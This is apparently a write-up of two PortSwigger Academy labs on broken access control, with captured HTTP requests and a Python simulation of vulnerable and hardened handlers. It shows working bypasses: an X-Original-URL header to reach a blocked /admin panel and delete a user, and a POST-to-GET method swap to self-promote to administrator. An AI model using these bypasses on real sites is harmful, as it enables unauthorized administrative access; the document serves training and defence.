PortSwigger Academy - More Broken Access Control Labs.

Lab: URL-based access control can be circumvented

This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.
To solve the lab, access the admin panel and delete the user carlos.
Link to lab: https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented

When we try to reach the admin panel through the front-end system, we get “access denied”. Intercepted, the request looks like this:

GET /admin HTTP/1.1
Host: 0a4100100341d6af81f4bb30009d00ae.web-security-academy.net
Cookie: session=57EynBodRDJEQ7CmkwnYzAR2kh24whYR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a4100100341d6af81f4bb30009d00ae.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

What we did was replace the request line

GET /admin HTTP/1.1

with

POST / HTTP/2
X-Original-Url: /admin/

This returned the admin panel in the response. From there we can use the information shown in the panel to delete the user carlos (/admin/delete?username=carlos).


Lab: Method-based access control can be circumvented

This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
Link to lab: https://portswigger.net/web-security/access-control/lab-method-based-access-control-can-be-circumvented

Using the admin credentials we see that the role upgrade request looks like this:

POST /admin-roles HTTP/2
Host: 0a3500760486f48e80ed35c4002d0086.web-security-academy.net
Cookie: session=jzjXTYjlxHZIyKGW4a1IEsYfwHruxGZU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a3500760486f48e80ed35c4002d0086.web-security-academy.net
Referer: https://0a3500760486f48e80ed35c4002d0086.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=carlos&action=upgrade

Sending the same request from wiener’s session does not work; you get “Unauthorized”. Instead I replaced the POST method with GET, changing

POST /admin-roles HTTP/2

for

GET /admin-roles?username=wiener&action=upgrade HTTP/2

(An easier way of doing it that I didn’t know about: right-click the request in Burp and select “Change request method”.)
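To make the two failure modes concrete from the defender's side, here is a small Python model covering both labs; it is an added example, not PortSwigger's lab code. For the first lab it models a front-end that denies /admin by URL path while the back-end rewrites the path from X-Original-URL, next to a hardened variant that strips path-override headers at the edge. For the second lab it models a role-upgrade handler whose admin check is tied to the POST method, next to a variant that applies the check to the resource on every method. The Request class, the user/role table, the merged query-and-body parameter handling and the header list are all constructed assumptions for the simulation.

```python
"""Added example (not PortSwigger's code): a model of the two mistakes in the
labs above. Lab 1: a front-end blocks /admin by URL path while the back-end
honours X-Original-URL. Lab 2: the role-upgrade endpoint checks authorization
only for POST. Each is shown next to a hardened variant. All requests, users
and the override-header list are constructed for the simulation."""

from dataclasses import dataclass, field
from urllib.parse import urlsplit, parse_qs

# Header names that some frameworks treat as a path override (constructed
# list); the framework behaviour itself is simulated in back_end_route().
PATH_OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url"}


@dataclass
class Request:
    method: str
    target: str                      # request-target, e.g. "/admin-roles?username=x"
    headers: dict = field(default_factory=dict)
    body: str = ""
    session_user: str = "anonymous"  # simulated: the user bound to the session cookie

    @property
    def path(self):
        return urlsplit(self.target).path

    def params(self):
        """Merge query-string and form-body parameters, as many frameworks do.
        This is what lets a GET with ?username=..&action=.. stand in for the
        POST form in lab 2."""
        merged = parse_qs(urlsplit(self.target).query)
        merged.update(parse_qs(self.body))
        return {k: v[0] for k, v in merged.items()}


# ---- Lab 1: URL-based access control -------------------------------------

def front_end_filter(req, strip_overrides):
    """Edge filter: denies /admin by path. Hardened: also drops override
    headers so the back-end only ever routes on the path the edge inspected."""
    if req.path.rstrip("/") == "/admin" or req.path.startswith("/admin/"):
        return 403, "Access denied"
    if strip_overrides:
        req.headers = {k: v for k, v in req.headers.items()
                       if k.lower() not in PATH_OVERRIDE_HEADERS}
    return None, req


def back_end_route(req, honour_overrides):
    """Back-end routing. Vulnerable: an override header replaces the URL path."""
    path = req.path
    if honour_overrides:
        for name, value in req.headers.items():
            if name.lower() in PATH_OVERRIDE_HEADERS:
                path = urlsplit(value).path
    if path.rstrip("/") == "/admin":
        return 200, "admin panel"
    return 404, "not found"


def lab1(req, hardened):
    """Front-end filter followed by back-end routing."""
    status, out = front_end_filter(req, strip_overrides=hardened)
    if status is not None:
        return status, out
    return back_end_route(out, honour_overrides=not hardened)


# ---- Lab 2: method-based access control ----------------------------------

def admin_roles(req, roles, check_every_method):
    """Role-upgrade endpoint. Vulnerable: the admin check is tied to POST, so a
    GET carrying the same parameters skips it. Hardened: the check is tied to
    the resource and runs whatever the method."""
    if req.method == "POST" or check_every_method:
        if roles.get(req.session_user) != "admin":
            return 401, "Unauthorized"
    p = req.params()
    if p.get("action") == "upgrade" and p.get("username") in roles:
        roles[p["username"]] = "admin"
        return 200, "upgraded " + p["username"]
    return 400, "bad request"


if __name__ == "__main__":
    direct = Request("GET", "/admin")
    override = Request("POST", "/", {"X-Original-Url": "/admin/"})
    print("lab1 vulnerable:", lab1(direct, False), lab1(override, False))
    print("lab1 hardened:  ", lab1(direct, True), lab1(override, True))
    roles = {"administrator": "admin", "wiener": "user"}
    get_upgrade = Request("GET", "/admin-roles?username=wiener&action=upgrade",
                          session_user="wiener")
    print("lab2 vulnerable:", admin_roles(get_upgrade, dict(roles), False))
    print("lab2 hardened:  ", admin_roles(get_upgrade, dict(roles), True))
```

The two fixes are independent: stripping override headers at the edge removes the path disagreement between front-end and back-end, and moving the authorization check from "is this a POST?" to "does this session hold the admin role for this resource?" removes the method dependence; neither fix relies on the other.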